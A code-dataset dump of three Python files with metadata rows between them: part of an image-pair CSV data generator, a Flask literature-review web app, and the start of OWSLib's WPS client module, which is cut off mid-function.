'or \'img_file1,img_file2,,,,,\''.format(line)), None)
img_key = img_file1 + "@" + img_file2
if img_key not in result:
result[img_key] = []
# If a row contains only an image path, it's an image without annotations.
if (x1, y1, x2, y2, class_name) == ('', '', '', '', ''):
continue
x1 = _parse(x1, int, 'line {}: malformed x1: {{}}'.format(line))
y1 = _parse(y1, int, 'line {}: malformed y1: {{}}'.format(line))
x2 = _parse(x2, int, 'line {}: malformed x2: {{}}'.format(line))
y2 = _parse(y2, int, 'line {}: malformed y2: {{}}'.format(line))
# Check that the bounding box is valid.
if x2 <= x1:
raise ValueError('line {}: x2 ({}) must be higher than x1 ({})'.format(line, x2, x1))
if y2 <= y1:
raise ValueError('line {}: y2 ({}) must be higher than y1 ({})'.format(line, y2, y1))
# check if the current class name is correctly present
if class_name not in classes:
raise ValueError('line {}: unknown class name: \'{}\' (classes: {})'.format(line, class_name, classes))
result[img_key].append({'x1': x1, 'x2': x2, 'y1': y1, 'y2': y2, 'class': class_name})
return result
def _open_for_csv(path):
""" Open a file with flags suitable for csv.reader.
This is different for python2 it means with mode 'rb',
for python3 this means 'r' with "universal newlines".
"""
if sys.version_info[0] < 3:
return open(path, 'rb')
else:
return open(path, 'r', newline='', encoding='utf-8-sig')
class CSVGenerator(Generator):
""" Generate data for a custom CSV dataset.
See https://github.com/fizyr/keras-retinanet#csv-datasets for more information.
"""
def __init__(
self,
csv_data_file,
csv_class_file,
base_dir=None,
**kwargs
):
""" Initialize a CSV data generator.
Args
csv_data_file: Path to the CSV annotations file.
csv_class_file: Path to the CSV classes file.
base_dir: Directory w.r.t. where the files are to be searched (defaults to the directory containing the csv_data_file).
"""
self.image_names = []
self.image_data = {}
self.base_dir = base_dir
# Take base_dir from annotations file if not explicitly specified.
if self.base_dir is None:
self.base_dir = os.path.dirname(csv_data_file)
# parse the provided class file
try:
with _open_for_csv(csv_class_file) as file:
self.classes = _read_classes(csv.reader(file, delimiter=','))
except ValueError as e:
raise_from(ValueError('invalid CSV class file: {}: {}'.format(csv_class_file, e)), None)
self.labels = {}
for key, value in self.classes.items():
self.labels[value] = key
# csv with img_path, x1, y1, x2, y2, class_name
try:
with _open_for_csv(csv_data_file) as file:
self.image_data = _read_annotations(csv.reader(file, delimiter=','), self.classes)
except ValueError as e:
raise_from(ValueError('invalid CSV annotations file: {}: {}'.format(csv_data_file, e)), None)
self.image_names = list(self.image_data.keys())
super(CSVGenerator, self).__init__(**kwargs)
def size(self):
""" Size of the dataset.
"""
return len(self.image_names)
def num_classes(self):
""" Number of classes in the dataset.
"""
return max(self.classes.values()) + 1
def has_label(self, label):
""" Return True if label is a known label.
"""
return label in self.labels
def has_name(self, name):
""" Returns True if name is a known class.
"""
return name in self.classes
def name_to_label(self, name):
""" Map name to label.
"""
return self.classes[name]
def label_to_name(self, label):
""" Map label to name.
"""
return self.labels[label]
def image_path(self, image_index):
""" Returns the image path for image_index.
"""
return os.path.join(self.base_dir, self.image_names[image_index])
def two_images_path(self, image_index):
""" Returns the image paths of two images for image_index.
"""
img1, img2 = self.image_names[image_index].split('@')
img1_path = os.path.join(self.base_dir, img1)
img2_path = os.path.join(self.base_dir, img2)
return img1_path, img2_path
def image_aspect_ratio(self, image_index):
""" Compute the aspect ratio for an image with image_index.
"""
# PIL is fast for metadata
image = Image.open(self.two_images_path(image_index)[0])
return float(image.width) / float(image.height)
def load_image(self, image_index):
""" Load two images at the image_index.
"""
img1_path, img2_path = self.two_images_path(image_index)
img1 = read_image_bgr(img1_path)
img2 = read_image_bgr(img2_path)
return [img1, img2]
def load_annotations(self, image_index):
""" Load annotations for an image_index.
"""
path = self.image_names[image_index]
annotations = {'labels': np.empty((0,)), 'bboxes': np.empty((0, 4))}
for idx, annot in enumerate(self.image_data[path]):
annotations['labels'] = np.concatenate((annotations['labels'], [self.name_to_label(annot['class'])]))
annotations['bboxes'] = np.concatenate((annotations['bboxes'], [[
float(annot['x1']),
float(annot['y1']),
float(annot['x2']),
float(annot['y2']),
]]))
return annotations
| 34.414226
| 131
| 0.610213
|
562996b35f661c3a718fa2eebfb78bae22de2c5a
| 9,016
|
py
|
Python
|
app.py
|
TimeWz667/LitReviewer
|
89574914c8148d758d82325b9dbff26bc6d6f1cc
|
[
"MIT"
] | null | null | null |
app.py
|
TimeWz667/LitReviewer
|
89574914c8148d758d82325b9dbff26bc6d6f1cc
|
[
"MIT"
] | null | null | null |
app.py
|
TimeWz667/LitReviewer
|
89574914c8148d758d82325b9dbff26bc6d6f1cc
|
[
"MIT"
] | null | null | null |
from flask import Flask, request, render_template, send_file, session, redirect, url_for, jsonify, Response
import reviewer
__author__ = 'TimeWz667'
abbreviations = ['HIV', 'STD', 'NCD', 'SD', 'DES', 'ABM', 'EBM', 'BMC', 'I', 'II', 'OR',
'SIR', 'SID', 'SEIR', 'SIRS', 'ODE', 'PDE', 'SDE',
'IEEE', 'PLOS', 'WSC', 'JAIDS', 'RIVF', '(RIVF)', '(WSC)']
out_reasons = ['X Topic', 'X Paper Type', 'X Human', 'X Between human',
'X ABM', 'X EBM',
'X Interaction', 'X Sim or Imp']
class ReviewerFlask(Flask):
jinja_options = Flask.jinja_options.copy()
jinja_options.update(dict(
block_start_string='<%',
block_end_string='%>',
variable_start_string='<{',
variable_end_string='}>',
comment_start_string='<#',
comment_end_string='#>'
))
def __init__(self, name, **kwargs):
Flask.__init__(self, name, **kwargs)
self.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
app = ReviewerFlask(__name__)
app.secret_key = 'han han key'
def check_info():
if 'username' not in session:
return redirect(url_for('login'))
username = session.get('username')
if username not in reviewer.Reviewers:
del session['username']
return redirect(url_for('login'))
user = reviewer.Reviewers[username]
if not user.PaperList:
return redirect(url_for('select_project'))
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
username = request.form['UserName']
# todo validate name
session['username'] = username
reviewer.login_reviewer(username)
return redirect(url_for('select_project'))
form = reviewer.LoginForm()
return render_template('Login.html', form=form)
@app.route('/logout', methods=['GET'])
def logout():
username = session.get('username')
reviewer.logout_reviewer(username)
return redirect(url_for('login'))
@app.route('/project', methods=['GET'])
def select_project():
if 'username' not in session:
return redirect(url_for('login'))
reviewer.detach_project(session.get('username'))
new_form = reviewer.NewProjectForm()
new_form.BibFile.choices = reviewer.list_bib()
new_form.FormFile.choices = reviewer.list_form()
load_form = reviewer.LoadProjectForm()
load_form.ProjectFile.choices = reviewer.list_project()
return render_template('Project.html', new_form=new_form, load_form=load_form)
@app.route('/project/load', methods=['POST'])
def load_project():
form = reviewer.LoadProjectForm()
if form.ProjectUpload.has_file():
_, pro = reviewer.upload_bib(form.BibUpload.data)
else:
pro = form.ProjectFile.data
pl_name = reviewer.load_project(pro)
username = session.get('username')
reviewer.attach_project(username, pl_name)
return redirect(url_for('index'))
@app.route('/project/new', methods=['POST'])
def new_project():
form = reviewer.NewProjectForm()
if form.BibUpload.has_file():
_, bib = reviewer.upload_bib(form.BibUpload.data)
else:
bib = form.BibFile.data
if form.FormUpload.has_file():
_, questions = reviewer.upload_form(form.FormUpload.data)
else:
questions = form.FormFile.data
pl_name = reviewer.new_project(form.ProjectName.data, bib, questions, abbreviations)
username = session.get('username')
reviewer.attach_project(username, pl_name)
return redirect(url_for('index'))
@app.route('/')
def index():
check = check_info()
if check:
return check
username = session.get('username')
pro = reviewer.get_project_name(username)
pl = reviewer.find_papers(username)
sts = reviewer.summarise_paper_status(username)
return render_template('PaperList.html', title='List of papers', user=username, obj=pro, sts=sts,
papers=pl)
@app.route('/paper/<paper_id>', methods=['GET', 'POST'])
def read_paper(paper_id):
check = check_info()
if check:
return check
username = session.get('username')
if request.method == 'POST':
reviewer.fetch_data(username, paper_id, request.form)
if 'btn' in request.form:
if request.form['btn'] == 'Save':
pass
elif request.form['btn'] == 'Approve':
reviewer.approve_paper(username, paper_id)
elif request.form['btn'] == 'Disapprove':
reviewer.disapprove_paper(username, paper_id)
elif 'btn-drop' in request.form:
reviewer.drop_paper(username, paper_id, request.form['btn-drop'])
reviewer.save_project(username)
sts = reviewer.summarise_paper_status(username)
sel = reviewer.find_paper(username, paper_id)
tags = reviewer.get_exclusion_tags(username)
hp = 'previous' in sel
prv = '/paper/{}'.format(sel['previous']) if hp else '/'
hn = 'next' in sel
nxt = '/paper/{}'.format(sel['next']) if hn else '/'
return render_template('Paper.html', title=paper_id, user=username, obj=paper_id, sts=sts,
paper=sel['paper'], form=sel['form'], id=paper_id, out_reasons=tags,
has_previous=hp, previous=prv,
has_next=hn, next=nxt)
@app.route('/filter/<status>')
def filter_status(status):
username = session.get('username')
reviewer.filter_papers(username, status, [])
return redirect(url_for('index'))
@app.route('/summary')
def summary():
check = check_info()
if check:
return check
username = session.get('username')
sts = reviewer.summarise_paper_status(username)
return render_template('Summary.html', title='Summary', user=username, obj='summary', sts=sts)
@app.route('/figure/wordcloud/<paper_id>')
def abstract_wc(paper_id):
username = session.get('username')
txt = reviewer.find_paper(username, paper_id, detail=False).Abstract
return send_file(reviewer.make_word_cloud(txt), mimetype='image/png')
@app.route('/figure/wordcloud/')
def abstract_wc_all():
username = session.get('username')
txt = ' '.join(p.Abstract for p in reviewer.find_papers(username))
return send_file(reviewer.make_word_cloud(txt), mimetype='image/png')
@app.route('/exclusion', methods=['GET', 'POST'])
def tags_list():
check = check_info()
if check:
return check
username = session.get('username')
tags = reviewer.get_exclusion_tags(username)
tags = [tag for tag in tags if tag != 'X Topic']
if request.method == 'POST':
if 'btn' in request.form:
if request.form['btn'] == 'Save':
reviewer.save_project(username)
return render_template('Tags.html', tags=tags)
@app.route('/exclusion/add', methods=['POST'])
def add_tag():
check = check_info()
if check:
return check
username = session.get('username')
tags = reviewer.get_exclusion_tags(username)
content = request.form['content']
if not content or content in tags:
return redirect('/exclusion')
tags.append(content)
# reviewer.save_project(username)
return redirect('/exclusion')
@app.route('/exclusion/delete/<tag>')
def delete_tag(tag):
check = check_info()
if check:
return check
username = session.get('username')
tags = reviewer.get_exclusion_tags(username)
tags.remove(tag)
# reviewer.save_project(username)
return redirect('/exclusion')
@app.route('/output/csv')
def output_csv():
username = session.get('username')
pro = reviewer.get_project_name(username)
csv = reviewer.output_result_csv(username)
return Response(
csv,
mimetype='text/csv',
headers={'Content-disposition':
'attachment; filename={}_{}.csv'.format(username, pro)})
@app.route('/output/json')
def output_json():
username = session.get('username')
pro = reviewer.get_project_name(username)
json = str(jsonify(reviewer.output_result_json(username)))
return Response(
json,
mimetype='application/json',
headers={'Content-disposition':
'attachment; filename={}_{}.json'.format(username, pro)})
@app.route('/output/bib')
def output_bib():
username = session.get('username')
pro = reviewer.get_project_name(username)
bib = reviewer.output_bib(username)
return Response(
bib,
mimetype='text/bib',
headers={'Content-disposition':
'attachment; filename={}_{}.bib'.format(username, pro)})
@app.route('/output/sel_bib')
def output_sel_bib():
username = session.get('username')
pro = reviewer.get_project_name(username)
bib = reviewer.output_select_bib(username)
return Response(
bib,
mimetype='text/bib',
headers={'Content-disposition':
'attachment; filename={}_{}.bib'.format(username, pro)})
if __name__ == '__main__':
app.run(port=300)
| 30.053333
| 107
| 0.642968
|
1521aa2b439eb9c46e342551b8ebc40314d9f022
| 79,861
|
py
|
Python
|
owslib/wps.py
|
jannefleischer/OWSLib
|
e0f82ce01c4f3d18c2e25938987af3e9bcc6ecad
|
[
"BSD-3-Clause"
] | null | null | null |
owslib/wps.py
|
jannefleischer/OWSLib
|
e0f82ce01c4f3d18c2e25938987af3e9bcc6ecad
|
[
"BSD-3-Clause"
] | null | null | null |
owslib/wps.py
|
jannefleischer/OWSLib
|
e0f82ce01c4f3d18c2e25938987af3e9bcc6ecad
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: ISO-8859-15 -*-
# =============================================================================
# Copyright (c) 2018 Luca Cinquini
#
# Authors : Luca Cinquini <luca.cinquini@jpl.nasa.gov>
# Carsten Ehbrecht <ehbrecht@dkrz.de>
#
# Contact email: ehbrecht@dkrz.de
# =============================================================================
"""
Abstract
--------
The wps module of the OWSlib package provides client-side functionality for executing invocations to a remote
Web Processing Server.
Disclaimer
----------
.. warning:: The owslib wps module should be considered in beta state: it has been tested versus only a handful of
WPS services (deployed by the USGS, BADC and PML).
More extensive testing is needed and feedback is appreciated.
Usage
-----
The module can be used to execute three types of requests versus a remote WPS endpoint:
# "GetCapabilities"
* use the method wps.getcapabilities(xml=None)
* the optional keyword argument "xml" may be used to avoid a real live request, and instead read the
WPS capabilities document from a cached XML file
# "DescribeProcess"
* use the method wps.describeprocess(identifier, xml=None)
* identifier is the process identifier, retrieved from the list obtained from a previous
"GetCapabilities" invocation
* the optional keyword argument "xml" may be used to avoid a real live request, and instead read the
WPS process description document from a cached XML file
# "Execute"
* use the method wps.execute(identifier, inputs, output=None, request=None, response=None),
which submits the job to the remote WPS server and returns a WPSExecution object that can be used to periodically
check the job status until completion (or error)
* the optional keyword argument "request" may be used to avoid re-building the request XML from input arguments,
and instead submit a request from a pre-made XML file
* alternatively, an "Execute" request can be built from input arguments by supplying the "identifier", "inputs"
and "output" arguments to the execute() method.
* "identifier" is the mandatory process identifier
* "inputs" is a dictionary of (key,value) pairs where:
* key is a named input parameter
* value is either a string, or any python object that supports a getXml() method
In particular, a few classes are included in the package to support a FeatuteCollection input:
* "WFSFeatureCollection" can be used in conjunction with "WFSQuery" to define a FEATURE_COLLECTION
retrieved from a live WFS server.
* "GMLMultiPolygonFeatureCollection" can be used to define one or more polygons
of (latitude, longitude) points.
* "output" is an optional output identifier to be included in the ResponseForm section of the request.
* the optional keyword argument "response" mey be used to avoid submitting a real live request, and instead
reading the WPS execution response document from a cached XML file (for debugging or testing purposes)
* the convenience module function monitorExecution() can be used to periodically check the status of a remote
running job, and eventually download the output either to a named file, or to a file specified by the server.
Examples
--------
The files examples/wps-usgs-script.py, examples/wps-pml-script-1.py and examples/wps-pml-script-2.py contain
real-world usage examples that submits a "GetCapabilities", "DescribeProcess" and "Execute" requests to
the live USGS and PML servers. To run:
* cd examples
* python wps-usgs-script.py
* python wps-pml-script-1.py
* python wps-pml-script-2.py
The file wps-client.py contains a command-line client that can be used to submit a "GetCapabilities",
"DescribeProcess" or "Execute" request to an arbitratry WPS server. For example, you can run it as follows:
* cd examples
* To prints out usage and example invocations: wps-client -help
* To execute a (fake) WPS invocation::
$ wps-client.py -v -u http://cida.usgs.gov/climate/gdp/process/WebProcessingService -r GetCapabilities -x ../tests/USGSCapabilities.xml # noqa
The directory tests/ includes several doctest-style files wps_*.txt that show how to interactively submit a
"GetCapabilities", "DescribeProcess" or "Execute" request, without making a live request but rather parsing the
response of cached XML response documents. To run:
* cd tests
* python -m doctest wps_*.txt
``(or python -m doctest -v wps_*.txt for verbose output)``
Also, the directory tests/ contains several examples of well-formed "Execute" requests:
* The files wps_USGSExecuteRequest*.xml contain requests that can be submitted to the live USGS WPS service.
* The files PMLExecuteRequest*.xml contain requests that can be submitted to the live PML WPS service.
"""
from owslib.etree import etree
from owslib.ows import DEFAULT_OWS_NAMESPACE, XLINK_NAMESPACE
from owslib.ows import ServiceIdentification, ServiceProvider, OperationsMetadata, BoundingBox
from time import sleep
from owslib.util import (testXMLValue, testXMLAttribute, build_get_url, clean_ows_url, dump, getTypedValue,
getNamespace, element_to_string, nspath, openURL, nspath_eval, log, Authentication)
from xml.dom.minidom import parseString
from owslib.namespaces import Namespaces
from urllib.parse import urlparse
# namespace definition
n = Namespaces()
# These static namespaces are DEPRECIATED. Please don't use them.
# No great way of printing a message since there are at the file level
WPS_DEFAULT_NAMESPACE = n.get_namespace("wps")
WFS_NAMESPACE = n.get_namespace("wfs")
OGC_NAMESPACE = n.get_namespace("ogc")
GML_NAMESPACE = n.get_namespace("gml")
DRAW_NAMESPACE = n.get_namespace("draw")
GML_SCHEMA_LOCATION = "http://schemas.opengis.net/gml/3.1.1/base/feature.xsd"
DRAW_SCHEMA_LOCATION = 'http://cida.usgs.gov/climate/derivative/xsd/draw.xsd'
WFS_SCHEMA_LOCATION = 'http://schemas.opengis.net/wfs/1.1.0/wfs.xsd'
WPS_DEFAULT_SCHEMA_LOCATION = 'http://schemas.opengis.net/wps/1.0.0/wpsExecute_request.xsd'
WPS_DEFAULT_VERSION = '1.0.0'
# WPS execution modes
AUTO = 'auto'
SYNC = 'sync'
ASYNC = 'async'
def get_namespaces():
ns = n.get_namespaces(["ogc", "wfs", "wps", "gml", "xsi", "xlink"])
ns[None] = n.get_namespace("wps")
ns["ows"] = DEFAULT_OWS_NAMESPACE
return ns
namespaces = get_namespaces()
def is_reference(val):
"""
Checks if the provided value is a reference (URL).
"""
try:
parsed = urlparse(val)
is_ref = bool(parsed.scheme)
except Exception:
is_ref = False
return is_ref
def is_literaldata(val):
"""
Checks if the provided value is a string (includes unicode).
"""
return isinstance(val, str)
def is_boundingboxdata(val):
"""
Checks if the provided value is an implementation of ``BoundingBoxDataInput``.
"""
return isinstance(val, BoundingBoxDataInput)
def is_complexdata(val):
"""
Checks if the provided value is an implementation of ``IComplexDataInput``.
"""
return isinstance(val, IComplexDataInput)
class IComplexDataInput(object):
"""
Abstract interface representing complex input object for a WPS request.
"""
def getXml(self):
"""
Method that returns the object data as an XML snippet,
to be inserted into the WPS request document sent to the server.
"""
raise NotImplementedError
class WebProcessingService(object):
"""
Class that contains client-side functionality for invoking an OGC Web Processing Service (WPS).
Implements IWebProcessingService.
"""
def __init__(self, url, version=WPS_DEFAULT_VERSION, username=None, password=None, verbose=False, skip_caps=False,
headers=None, verify=True, cert=None, timeout=None, auth=None):
"""
Initialization method resets the object status.
By default it will execute a GetCapabilities invocation to the remote service,
which can be skipped by using skip_caps=True.
"""
if auth:
if username:
auth.username = username
if password:
auth.password = password
if cert:
auth.cert = cert
if verify:
auth.verify = verify
self.auth = auth or Authentication(username, password, cert, verify)
# fields passed in from object initializer
self.url = clean_ows_url(url)
self.version = version
self.verbose = verbose
self.headers = headers
self.timeout = timeout
# fields populated by method invocations
self._capabilities = None
self.identification = None
self.provider = None
self.operations = []
self.processes = []
if not skip_caps:
self.getcapabilities()
def getcapabilities(self, xml=None):
"""
Method that requests a capabilities document from the remote WPS server and populates this object's metadata.
keyword argument xml: local XML GetCapabilities document, prevents actual HTTP invocation.
"""
# read capabilities document
reader = WPSCapabilitiesReader(
version=self.version, verbose=self.verbose, auth=self.auth)
if xml:
# read from stored XML file
self._capabilities = reader.readFromString(xml)
else:
self._capabilities = reader.readFromUrl(
self.url, headers=self.headers)
log.debug(element_to_string(self._capabilities))
# populate the capabilities metadata obects from the XML tree
self._parseCapabilitiesMetadata(self._capabilities)
def describeprocess(self, identifier, xml=None):
"""
Requests a process document from a WPS service and populates the process metadata.
Returns the process object or a list of process objects.
:param str identifier: The process id. If `all`, return a list of all processes available.
"""
# read capabilities document
reader = WPSDescribeProcessReader(
version=self.version, verbose=self.verbose, auth=self.auth)
if xml:
# read from stored XML file
rootElement = reader.readFromString(xml)
else:
# read from server
rootElement = reader.readFromUrl(
self.url, identifier, headers=self.headers)
log.info(element_to_string(rootElement))
# build metadata objects
processes = self._parseProcessMetadata(rootElement)
if identifier == 'all':
return processes
else:
return processes[0]
def execute(self, identifier, inputs, output=None, mode=ASYNC, lineage=False, request=None, response=None):
"""
Submits a WPS process execution request.
Returns a WPSExecution object, which can be used to monitor the status of the job, and ultimately
retrieve the result.
:param str identifier: the requested process identifier
:param inputs: list of process inputs as (input_identifier, value) tuples (where value is either a string
for LiteralData, or an object for ComplexData).
:param output: optional list of process outputs as tuples (output_identifier, as_ref, mime_type).
`as_ref` can be True (as reference),
False (embedded in response) or None (use service default).
`mime_type` should be text or None (use service default)
:param mode: execution mode: SYNC, ASYNC or AUTO. Default: ASYNC
:param lineage: if lineage is "true", the Execute operation response shall include the DataInputs and
OutputDefinitions elements.
:param request: optional pre-built XML request document, prevents building of request from other arguments
:param response: optional pre-built XML response document, prevents submission of request to live WPS server
"""
# instantiate a WPSExecution object
log.info('Executing WPS request...')
execution = WPSExecution(
version=self.version,
url=self.url,
verbose=self.verbose,
headers=self.headers,
timeout=self.timeout,
auth=self.auth
)
# build XML request from parameters
if request is None:
requestElement = execution.buildRequest(identifier, inputs, output, mode=mode, lineage=lineage)
request = etree.tostring(requestElement)
execution.request = request
log.debug(request)
# submit the request to the live server
if response is None:
response = execution.submitRequest(request)
else:
response = etree.fromstring(response)
log.debug(etree.tostring(response))
# parse response
execution.parseResponse(response)
return execution
def getOperationByName(self, name):
"""Return a named content item."""
for item in self.operations:
if item.name == name:
return item
raise KeyError("No operation named %s" % name)
def _parseProcessMetadata(self, rootElement):
"""Return a list of Process objects parsed from a <ProcessDescriptions> XML element."""
processDescriptionElements = rootElement.findall('ProcessDescription')
processes = []
for processDescriptionElement in processDescriptionElements:
process = Process(processDescriptionElement, verbose=self.verbose)
# override existing processes in object metadata, if existing already
found = False
for n, p in enumerate(self.processes):
if p.identifier == process.identifier:
self.processes[n] = process
found = True
# otherwise add it
if not found:
self.processes.append(process)
processes.append(process)
return processes
def _parseCapabilitiesMetadata(self, root):
"""Set up capabilities metadata objects."""
# reset metdata
self.operations = []
self.processes = []
# use the WPS namespace defined in the document root
# TODO: wpsns not used
# wpsns = getNamespace(root)
self.updateSequence = root.attrib.get('updateSequence')
# loop over children WITHOUT requiring a specific namespace
for element in root:
# thie element's namespace
ns = getNamespace(element)
# <ows:ServiceIdentification> metadata
if element.tag.endswith('ServiceIdentification'):
self.identification = ServiceIdentification(
element, namespace=ns)
if self.verbose is True:
dump(self.identification)
# <ows:ServiceProvider> metadata
elif element.tag.endswith('ServiceProvider'):
self.provider = ServiceProvider(element, namespace=ns)
if self.verbose is True:
dump(self.provider)
# <ns0:OperationsMetadata xmlns:ns0="http://www.opengeospatial.net/ows">
# <ns0:Operation name="GetCapabilities">
# <ns0:DCP>
# <ns0:HTTP>
# <ns0:Get xlink:href="http://ceda-wps2.badc.rl.ac.uk/wps?" xmlns:xlink="http://www.w3.org/1999/xlink" /> # noqa
# </ns0:HTTP>
# </ns0:DCP>
# </ns0:Operation>
# ........
# </ns0:OperationsMetadata>
elif element.tag.endswith('OperationsMetadata'):
for child in element.findall(nspath('Operation', ns=ns)):
self.operations.append(
OperationsMetadata(child, namespace=ns))
if self.verbose is True:
dump(self.operations[-1])
# <wps:ProcessOfferings>
# <wps:Process ns0:processVersion="1.0.0">
# <ows:Identifier xmlns:ows="http://www.opengis.net/ows/1.1">gov.usgs.cida.gdp.wps.algorithm.filemanagement.ReceiveFiles</ows:Identifier> # noqa
# <ows:Title xmlns:ows="http://www.opengis.net/ows/1.1">gov.usgs.cida.gdp.wps.algorithm.filemanagement.ReceiveFiles</ows:Title> # noqa
# </wps:Process>
# ......
# </wps:ProcessOfferings>
elif element.tag.endswith('ProcessOfferings'):
for child in element.findall(nspath('Process', ns=ns)):
p = Process(child, verbose=self.verbose)
self.processes.append(p)
if self.verbose is True:
dump(self.processes[-1])
class WPSReader(object):
"""
Superclass for reading a WPS document into a lxml.etree infoset.
"""
def __init__(self, version=WPS_DEFAULT_VERSION, verbose=False, timeout=30, auth=None):
self.version = version
self.verbose = verbose
self.timeout = timeout
self.auth = auth or Authentication()
def _readFromUrl(self, url, data, timeout, method='Get', username=None, password=None,
headers=None, verify=True, cert=None):
"""
Method to get and parse a WPS document, returning an elementtree instance.
:param str url: WPS service base url.
:param str data: GET: dictionary of HTTP (key, value) parameter pairs, POST: XML document to post
:param str username: optional user credentials
:param str password: optional user credentials
"""
username = username or self.auth.username
password = password or self.auth.password
cert = cert or self.auth.cert
verify = verify or self.auth.verify
if method == 'Get':
# full HTTP request url
request_url = build_get_url(url, data, overwrite=True)
log.debug(request_url)
# split URL into base url and query string to use utility function
spliturl = request_url.split('?')
u = openURL(spliturl[0], spliturl[
1], method='Get', username=username, password=password,
headers=headers, verify=verify, cert=cert, timeout=self.timeout)
return etree.fromstring(u.read())
elif method == 'Post':
u = openURL(url, data, method='Post',
username=username, password=password,
headers=headers, verify=verify, cert=cert, timeout=timeout)
return etree.fromstring(u.read())
else:
raise Exception("Unrecognized HTTP method: %s" % method)
def readFromString(self, string):
"""
Method to read a WPS GetCapabilities document from an XML string.
"""
if not isinstance(string, str) and not isinstance(string, bytes):
raise ValueError(
"Input must be of type string, not %s" % type(string))
return etree.fromstring(string)
class WPSCapabilitiesReader(WPSReader):
"""
Utility class that reads and parses a WPS GetCapabilities document into a lxml.etree infoset.
"""
def __init__(self, version=WPS_DEFAULT_VERSION, verbose=False, timeout=None, auth=None):
# superclass initializer
super(WPSCapabilitiesReader, self).__init__(
version=version, verbose=verbose, timeout=timeout, auth=auth)
def readFromUrl(self, url, username=None, password=None,
headers=None, verify=True, cert=None):
"""
Method to get and parse a WPS capabilities document, returning an elementtree instance.
:param str url: WPS service base url, to which is appended the HTTP parameters: service, version, and request.
:param str username: optional user credentials
:param str password: optional user credentials
"""
return self._readFromUrl(url,
{'service': 'WPS', 'request':
'GetCapabilities', 'version': self.version},
self.timeout,
username=username, password=password,
headers=headers, verify=verify, cert=cert)
class WPSDescribeProcessReader(WPSReader):
"""
Class that reads and parses a WPS DescribeProcess document into a etree infoset
"""
def __init__(self, version=WPS_DEFAULT_VERSION, verbose=False, timeout=None, auth=None):
# superclass initializer
super(WPSDescribeProcessReader, self).__init__(
version=version, verbose=verbose, timeout=timeout, auth=auth)
def readFromUrl(self, url, identifier, username=None, password=None,
headers=None, verify=True, cert=None):
"""
Reads a WPS DescribeProcess document from a remote service and returns the XML etree object
:param str url: WPS service base url, to which is appended the HTTP parameters: 'service', 'version',
'request', and 'identifier'.
"""
return self._readFromUrl(url,
{'service': 'WPS', 'request': 'DescribeProcess',
'version': self.version, 'identifier': identifier},
self.timeout,
username=username, password=password,
headers=headers, verify=verify, cert=cert)
class WPSExecuteReader(WPSReader):
"""
Class that reads and parses a WPS Execute response document into a etree infoset
"""
def __init__(self, verbose=False, timeout=None, auth=None):
# superclass initializer
super(WPSExecuteReader, self).__init__(verbose=verbose, timeout=timeout, auth=auth)
def readFromUrl(self, url, data={}, method='Get', username=None, password=None,
headers=None, verify=True, cert=None):
"""
Reads a WPS status document from a remote service and returns the XML etree object.
:param str url: the URL to submit the GET/POST request to.
"""
return self._readFromUrl(url, data, self.timeout, method, username=username, password=password,
headers=headers, verify=verify, cert=cert)
class WPSExecution(object):
"""
Class that represents a single WPS process executed on a remote WPS service.
"""
def __init__(self, version=WPS_DEFAULT_VERSION, url=None, username=None, password=None, verbose=False,
headers=None, verify=True, cert=None, timeout=None, auth=None):
if auth:
if username:
auth.username = username
if password:
auth.password = password
if cert:
auth.cert = cert
if verify:
auth.verify = verify
# initialize fields
self.url = url
self.version = version
self.verbose = verbose
self.headers = headers
self.auth = auth or Authentication(username, password, cert, verify)
self.timeout = timeout
# request document
self.request = None
# last response document
self.response = None
# status fields retrieved from the response documents
self.process = None
self.serviceInstance = None
self.status = None
self.percentCompleted = 0
self.statusMessage = None
self.errors = []
self.statusLocation = None
self.dataInputs = []
self.processOutputs = []
self.creationTime = None
def buildRequest(self, identifier, inputs=[], output=None, mode=ASYNC, lineage=False):
"""
Method to build a WPS process request.
:param str identifier: the requested process identifier
:param inputs: array of input arguments for the process.
- LiteralData inputs are expressed as simple (key,value) tuples where key is the input identifier,
value is the value
- ComplexData inputs are expressed as (key, object) tuples, where key is the input identifier,
and the object must contain a 'getXml()' method that returns an XML infoset to be included in
the WPS request
:param output: array of outputs which should be returned:
expressed as tuples (key, as_ref, mime_mype) where key is the output identifier and as_ref is True
if output should be returned as reference.
as_ref and mimeType may be null for using server's default value
:param mode: execution mode: SYNC, ASYNC or AUTO.
:param lineage: if lineage is "true", the Execute operation response shall include the DataInputs and
OutputDefinitions elements.
"""
# TODO: auto mode needs to implemented for WPS 2.0.0
if mode is SYNC:
_async = False
elif mode is AUTO:
log.warn("Auto mode not available in WPS 1.0.0. Using async mode.")
_async = True
else:
_async = True
# <wps:Execute xmlns:wps="http://www.opengis.net/wps/1.0.0"
# xmlns:ows="http://www.opengis.net/ows/1.1"
# xmlns:xlink="http://www.w3.org/1999/xlink"
# xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
# service="WPS"
# version="1.0.0"
# xsi:schemaLocation="http://www.opengis.net/wps/1.0.0
# http://schemas.opengis.net/wps/1.0.0/wpsExecute_request.xsd">
root = etree.Element(nspath_eval('wps:Execute', namespaces))
root.set('service', 'WPS')
root.set('version', WPS_DEFAULT_VERSION)
root.set(nspath_eval('xsi:schemaLocation', namespaces), '%s %s' %
(namespaces['wps'], WPS_DEFAULT_SCHEMA_LOCATION))
# <ows:Identifier>gov.usgs.cida.gdp.wps.algorithm.FeatureWeightedGridStatisticsAlgorithm</ows:Identifier>
identifierElement = etree.SubElement(
root, nspath_eval('ows:Identifier', namespaces))
identifierElement.text = identifier
# <wps:DataInputs>
dataInputsElement = etree.SubElement(
root, nspath_eval('wps:DataInputs', namespaces))
for (key, val) in inputs:
inputElement = etree.SubElement(
dataInputsElement, nspath_eval('wps:Input', namespaces))
identifierElement = etree.SubElement(
inputElement, nspath_eval('ows:Identifier', namespaces))
identifierElement.text = key
# Literal data
# <wps:Input>
# <ows:Identifier>DATASET_URI</ows:Identifier>
# <wps:Data>
# <wps:LiteralData>dods://igsarm-cida-thredds1.er.usgs.gov:8080/thredds/dodsC/dcp/conus_grid.w_meta.ncml</wps:LiteralData>
# </wps:Data>
# </wps:Input>
if is_literaldata(val):
log.debug("literaldata %s", key)
dataElement = etree.SubElement(
inputElement, nspath_eval('wps:Data', namespaces))
literalDataElement = etree.SubElement(
dataElement, nspath_eval('wps:LiteralData', namespaces))
literalDataElement.text = val
# Complex data
# <wps:Input>
# <ows:Identifier>FEATURE_COLLECTION</ows:Identifier>
